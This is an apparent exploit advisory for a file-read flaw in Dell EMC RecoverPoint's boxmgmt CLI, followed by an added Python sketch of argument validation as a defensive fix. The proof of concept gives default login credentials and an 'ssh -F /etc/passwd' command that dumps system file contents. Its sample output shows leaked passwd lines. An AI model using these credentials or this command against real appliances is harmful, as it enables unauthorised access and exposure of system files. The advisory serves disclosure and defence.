Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
 
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
 
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280
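
The transcript above shows the prompt allowing commands by name only, so ssh's -F option passes through and its parse errors echo the file. Below is an added example, not part of the original advisory and not Dell EMC's fix: a sketch of argument-level validation for such a prompt. The function names and the "ssh [-p PORT] IP" policy are assumptions; the command names are copied from the allow-list in the output.

```python
import ipaddress
import shlex

# Command names copied from the allow-list shown in the advisory output.
ALLOWED = {"ALAT", "NetDiag", "arp", "arping", "date", "ethtool", "kps.pl",
           "netstat", "ping", "ping6", "ssh", "telnet", "top", "uptime"}


def _is_ip(value):
    """True only for a literal IPv4/IPv6 address (never an option string)."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _valid_port(value):
    return value.isascii() and value.isdigit() and 1 <= int(value) <= 65535


def validate_internal_command(line):
    """Return (ok, reason). Hypothetical policy: for ssh, accept only
    'ssh [-p PORT] IP', so no option can name a file or a command."""
    try:
        argv = shlex.split(line)
    except ValueError:
        return False, "unparseable command line"
    if not argv or argv[0] not in ALLOWED:
        return False, "command not in allow-list"
    if argv[0] != "ssh":
        # Other commands would need their own argument rules (not shown).
        return True, "name allowed (arguments not covered by this example)"
    args = argv[1:]
    if len(args) == 3 and args[0] == "-p" and _valid_port(args[1]):
        args = args[2:]
    if len(args) == 1 and _is_ip(args[0]):
        return True, "ssh to literal IP address"
    return False, "ssh arguments outside permitted form"
```

Permitting a fixed argument shape, rather than listing options to block, means an option that was overlooked cannot get through.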
            
